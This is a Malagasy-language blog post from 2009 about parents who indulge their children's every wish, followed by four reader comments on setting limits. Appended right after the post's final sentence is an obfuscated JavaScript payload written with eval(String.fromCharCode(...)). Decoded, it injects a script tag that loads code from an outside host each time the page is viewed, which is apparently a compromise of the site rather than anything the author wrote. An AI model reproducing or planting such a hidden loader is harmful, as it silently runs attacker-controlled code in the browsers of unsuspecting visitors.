Warning: getimagesize(): Filename cannot be empty in /home/blaogyorg/public_html/wp-content/plugins/wp-open-graph/output.class.php on line 306
Blaogin’ny Namana Serasera weblog

Ny zanaka!

Eo @ fiainan’ny zanak’olombelona dia mitsimbadimbadika ary mitohy hatrany ny fitomboan’ny taranaka,

Amintsika Malagasy dia zava-dehibe tokoa ny fananana ‘zanaka’, rehefa manorina tokan-trano mantsy ny lahy sy vavy ( ireo aloha no ho resahiko fa tsy ny lahy sy lahy na ny vavy sy vavy) dia arahina fomba fiteny hoe :”… arahin-javavavy sy zaza-lahy e! miteraha 7 lahy 7 vavy é!” sns e!!! ekeko fa tsy ho @ izao vanim-potoana iainantsika izao intsony izany fomba fisainana izany, nefa dia tsy lavina fa niainan’n’ireo ray aman-drenintsika avy izany! @ izao mantsy dia misy ny tokan-trano tsy mametraka ho laharam-pahamehana @ fananana zanaka, ny antony veh???, mmhh samy manana ny azy, fa eo koa anefa ny fitiavan-tena na ny faha mombana tsotra izao e!, tsy hidirako lalina ny à iny fa tsy manaitra ahy.

Ny tena nanaitra ahy sy ny maha variana ahy dia @ izoa fotoana izao dia tahakan’ny ‘Andriamanitra’ kely ny zanaka na koa tahakan’ny ‘sampy’ kely ihany koa! ny tiako hambara dia ny hoe toa izay mahafinaritra ny ray aman-dreny ka tian’ny zanany na dia tsy mifanentana @ fomba fiainany aza ohatra dia toa azo ary manodidina ilay zaza intsony!!!!! tsy hoe fialonana ny mahatonga aho hilaza izany tsy akory ann, manana zanaka vavy efa 10 taona aho @ izao fa na amiko manokana aza dia stapako fa mahery lanja ilay ‘gourou’-keliko io hihih, izany hoe toa tsy hitandroana hasasarana na koa ahavizanana fa dia toa izay teneniny sy izay mba hany takiany dia toa azony daholo na dia zavatra tsy ilainy akory aza!!! tena tsy mitovy @ fomba ftaizana azoko mihintsy e! tsy miteny akory aho hoe dia fadiranovana izahay ann tsia, nanana ny ampy tokoa ary izay sahaza ho anay t@ taonanay avy izahay, moa veh ny fiainana ankehitriny no manosika antsika ray aman-dreny @ izao fotoana tsy hahay hametra ny filàna eo @ fiainan-janantsika avy?????

Teny kely tsy aritro ireo nahita ity lahatsoratra ity aho.

Am-bava homana tokoa ny fiainana ary am-po mieritra!eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


4 comments

Hevitra 4

  1. Kdaombaramita Kdaombaramita :: Jolay 14th, 2009 8:19 pm

    Tsy mety misokatra ilay lien nomenao io.

    Izay akia ilay fitiavan-janaka a ! Sady vavy tokana ny andry no samy manana ny fomba fitaizany e. Ny ahy aloha efa telo. Fa feheziko ihany aloha @ fahazoana kilalao :
    – izany hoe ampinarinay ny hoe izay zavatra tena ilaina no vidiana
    – mariky ny fahafaham-po sy fandrisihina @ zavatra tsara eritreretina na natao (notes) na fitondrantena ny fahazoana kilalao na vola.
    – natao hanamarihana fety (noely)
    – Sady question d’économie no question d’éducation en même temps

    Na izany ary anefa dia fihetsika hafa ny fanehoako tambitamby azy ireo : horokoroka, teny mamy, sangisangy, sns…

  2. sipagasy sipagasy :: Jolay 18th, 2009 12:27 pm

    ka izay anie hoa e!!! fa maro ny mihevitra fa rehefa manaraka ny sitrapoan’ilay zaza dia izay no mariky ny fitiavana azy. Mila fitaizana manokana koa isika ray aman-drany mba hahafantatra ny soa ho an’ny zanatsika, marina fa samy tsy misy te hanolotra vato mafana ny zanany fa misy manao izany tsy am-piheverana!!!!!! dia eo no mitarika ny olana @ fanomezana ‘fetra’ ilay zanaka…..

    Hoy tokoa mantsy isika hoe zanaka tiana tsy hitsitsiana rotsan-kazo.

  3. sipagasy sipagasy :: Jolay 18th, 2009 12:31 pm

    voahitsy akia ilay lahatsoratra tsy nety nisokatra ann

  4. miangaly miangaly :: Jolay 19th, 2009 2:03 pm

    hummm … mahatonga saina sy misy hisaintsainana ny ho avy kah. misaotra betsaka sipagasy a!

Leave a reply